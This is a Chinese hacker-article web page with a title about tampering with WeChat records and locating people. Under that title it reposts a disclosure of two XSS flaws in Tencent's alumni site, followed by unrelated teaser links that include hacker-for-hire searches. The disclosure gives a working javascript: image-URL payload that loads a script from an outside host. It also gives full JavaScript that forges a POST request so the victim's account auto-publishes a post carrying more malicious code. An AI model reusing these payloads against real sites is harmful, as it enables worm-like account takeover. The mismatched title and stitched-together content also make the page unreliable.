如何修改微信聊天记录 哪位朋友知道微信号码怎么定位找人

访客3年前黑客文章643

作者:孤鸿影 作者已通知腾讯。 漏洞一: *** 校友 班级共享硬盘 上传文件时对文件描述没有做任何过滤,导致XSS。 *** 校友使用了Ajax技术,来显示文件列表。在文件Msharemsg.js中使用innerHTML输出文件列表的HTML代码。由于使用了innerHTML,所以直接插入代码: 不会被执行。使用下面的格式既可:。加入defer属性,那么浏览器在下载脚本的时候就不会立即对其进行处理,而是继续对页面进行下载和解析。这样我们插入的JavaScript就能正常运行。 漏洞二: *** 校友在发blog时对插入图片过滤不严格,存在xss漏洞 在发blog时将插入图片URL写为如下代码即可触发: javascript:document.write('%3C%73%63%72%69%70%74%20%73%72%63%3D%22http://xxxxxx.com/xy.js%22%3E%3C%2F%73%63%72%69%70%74%3E');xy.js的作用是自动发布一篇日志,这篇日志中可以插入恶意代码,代码如下: var url="/index.php?mod=blog&act=dopost"; var content="blog_content=By%3A%E5%AD%A4%E9%B8%BF%E5%BD%B1&blog_title=XSS+test&category=%E4%B8%AA%E4%BA%BA%E6%97%A5%E8%AE%B0";   //日志内容,这里可以插入恶意代码 function _sd_Post(Url,  Args) { var xmlhttp; var error; eval('try {xmlhttp  = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {xmlhttp  = null;error=e;}'); if(null != xmlhttp) { xmlhttp.Open("POST",  Url, false); xmlhttp.setRequestHeader("x-requested-with",  "XMLHttpRequest"); xmlhttp.setRequestHeader("Referer",  "http://xy.qq.com/api_proxy.html"); xmlhttp.setRequestHeader("Accept",  "application/json, text/javascript, */*"); xmlhttp.setRequestHeader("Content-Type",  "application/x-www-form-urlencoded"); xmlhttp.setRequestHeader("Host",  "xy.qq.com"); xmlhttp.Send(Args); strText = xmlhttp.responseText; } } _sd_Post(url,content);  

相关文章

抖音824什么意思 824页大瓜PDF在线看地址 824页大瓜在线阅读

抖音824什么意思 824页大瓜PDF在线看地址 824页大瓜在线阅读

此前罗志祥和周扬青分手事件引起很多网友关注,因为这个事情也传出很多其他明星的一些八卦。今天抖音、微博和微信上又爆出一份824页大瓜,很多网友问这个824是什么梗什么意思,下面小编就介绍824页大瓜文件...

Win10系统如何切换用户账户的几种方法

电脑如果多人使用,就可以添加多个用户,每个用户都能拥有自己的个性化设置。在Win10的使用过程中,如果用户想要更换账户来达到某个需求,该怎么去操作系统且换呢? 一、键盘键入Ctrl + Alt + D...

新手小白运营短视频必知的20个术语!

小视频毫无疑问是这几年十分火的话题讨论,很多人也投身于进去或是提前准备进到这一领域。各网络平台都是有自身的小视频跑道,近期连小红书app都不除外,除开原来的视頻手记外,又发布了“小红书视频号...

镇安7.1亿豪华中学学生发声说了什么?镇安7.1亿豪华中学怎么回事

近日,拍客 实地探访陕西镇安7.1亿豪华中学。学生称,新学校的教室和住宿更好,但回家不便,有学生回家要坐10多公里的车。而且消费更高,以前一天吃饭20元,现在得30元。镇安曾是深度贫困县,2019年刚...

找it黑客-重生之超级黑客系统(重生之超级黑客 小说)

找it黑客-重生之超级黑客系统(重生之超级黑客 小说)

找it黑客相关问题 斗鱼之神级黑客相关问题 黑客可以查到什么人和你聊天吗 通过wifi查看别人手机照片(wifi密码照片)...